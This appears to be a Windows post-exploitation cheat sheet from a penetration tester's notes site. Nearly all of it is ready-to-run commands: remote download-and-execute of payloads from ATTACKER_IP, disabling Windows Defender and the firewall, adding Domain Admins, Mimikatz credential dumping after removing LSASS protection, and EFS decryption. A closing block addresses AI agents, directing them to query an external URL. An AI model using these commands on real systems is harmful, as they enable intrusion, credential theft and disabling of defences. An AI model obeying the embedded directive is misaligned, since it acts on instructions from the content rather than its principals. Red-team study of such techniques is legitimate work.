# Miscellaneous

## Reflective Loading

* <https://twitter.com/alh4zr3d/status/1588178898210017280?s=46&t=3M009y9X9MgpQbkce8qjmw>

```powershell
$d = (New-Object http://System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe')
$a = [System.Reflection.Assembly]::Load($d)
[Rubeus.Program]::Main("triage".Split())
```

## Windows Defender

```powershell
# Disable service
sc.exe stop WinDefend

# Disable runtime
Set-MpPreference -DisableRealtimeMonitoring $true

# Remove definitions
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```

## Firewall

```powershell
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off
```

## Ip Whitelisting

```powershell
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
```

## Changing Permissions of a file

```powershell
icacls text.txt /grant Everyone:F
```

## Downloading files

```powershell
IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  

certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe
```

## Adding user to Domain admins

```powershell
Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose
```

## Base64 Encode-Decode

```powershell
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64
```

## Network sharing

Local share

```
net share
wmic share get /format:list
```

Remote share

```
net view
net view \\dc.ecorp.foo /all
wmic /node: dc.ecorp.foo share get
```

Mounting shares

```powershell
net use Z: \\127.0.0.1\C$ /user:morph3 password123
```

Hosting a local smbserver

```
impacket-smbserver -smb2support morph3-share . 
```

## Port Forwarding

```powershell
# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56
```

## Powershell Portscan

```powershell
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null
```

## Recovering Powershell Secure String

```powershell
######
$user = "morph3"
$file = "morph3-pass.xml"
$cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }

######
[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR("string"))

######
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result 
```

## Injecting PowerShell scripts Into sessions

```powershell
Invoke-Command -FilePath scriptname -Sessions $sessions
Enter-PSSession -Session $sess
```

## Enable RDP

In cmd.exe,

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```

In powershell,

```
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

net localgroup "Remote Desktop Users" morph3 /add

# Reruling firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
```

## Decrypting EFS files with Mimikatz

Follow the link here [How to Decrypt EFS Files](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)

```py
privilege::debug 
token::elevate 
crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export

dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"

# Clear text password 
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123

# After this command you must have the exported .der and .pvk files
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

openssl x509 -inform DER -outform PEM -in blah.der -out public.pem

openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem

openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Import the certificate
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot

type "C:\Users\Administrator\Documents\encrypted.txt"
```

## Patching LSA&#x20;

* <https://itm4n.github.io/lsass-runasppl/>

Check if LSA Protection is enabled,

```
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL
```

Upload mimikatz and mimidrv.sys and patch it using&#x20;

```
!+
!processprotect /process:lsass.exe /remove
```

```
c:\Users\administrator\Desktop>.\mimikatz_x64.exe
.\mimikatz_x64.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

ERROR mimikatz_doLocal ; "" command of "standard" module not found !

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 672 -> 00/00 [0-0-0]

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; ...
Session           : Interactive from 0
User Name         : Administrator

...


```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.morph3.blog/windows/miscellaneous.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.